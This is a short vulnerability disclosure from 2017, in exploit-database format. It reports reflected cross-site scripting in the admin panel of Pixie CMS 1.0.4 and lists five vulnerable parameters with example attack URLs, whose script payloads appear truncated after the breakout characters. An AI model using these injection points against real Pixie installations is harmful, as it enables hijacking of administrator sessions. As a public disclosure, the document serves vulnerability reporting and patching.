# Exploit Title: XSS Vulnerability on Pixie 1.0.4 # Google Dork: no # Date: 29-03-2017 # Exploit Author: @rungga_reksya, @dickysofficial # Vendor Homepage: http://www.getpixie.co.uk # Software Link: https://us.softpedia-secure-download.com/dl/44791fdde14260bc7a8d08df65bcd048/58db4b5c/700044699/webscripts/php/pixie_v1.04.zip # Version: 1.0.4 # Tested on: Windows Server 2012 Datacenter Evaluation I. Background: Pixie is a free, open source web application that will help quickly create your own website. Many people refer to this type of software as a "content management system (cms)", we prefer to call it as Small, Simple, Site Maker. II. Description: XSS Vulnerability on Pixie 1.0.4 We found XSS on perimeters: s=login&m= s=settings&x= s=publish&m=static&x= s=publish&m=dynamic&x= s=publish&m=module&x= III. Exploit: - http://ip_address/folder_pixie_v1.04/admin/?s=login&m="> or http://ip_address/folder_pixie_v1.04/admin/index.php?s=login&m="> - http://ip_address/folder_pixie_v1.04/admin/index.php?s=settings&x="> - http://ip_address/folder_pixie_v1.04/admin/index.php?s=publish&m=static&x="> - http://ip_address/folder_pixie_v1.04/admin/index.php?s=publish&m=dynamic&x="> - http://ip_address/folder_pixie_v1.04/admin/index.php?s=publish&m=module&x="> IV. Thanks to: - Alloh SWT - https://packetstormsecurity.com/files/126870/Pixie-CMS-1.04-Cross-Site-Scripting.html - MyBoboboy - @dickysofficial - Komunitas IT Auditor & IT Security Kaskus - Openbugbounty.org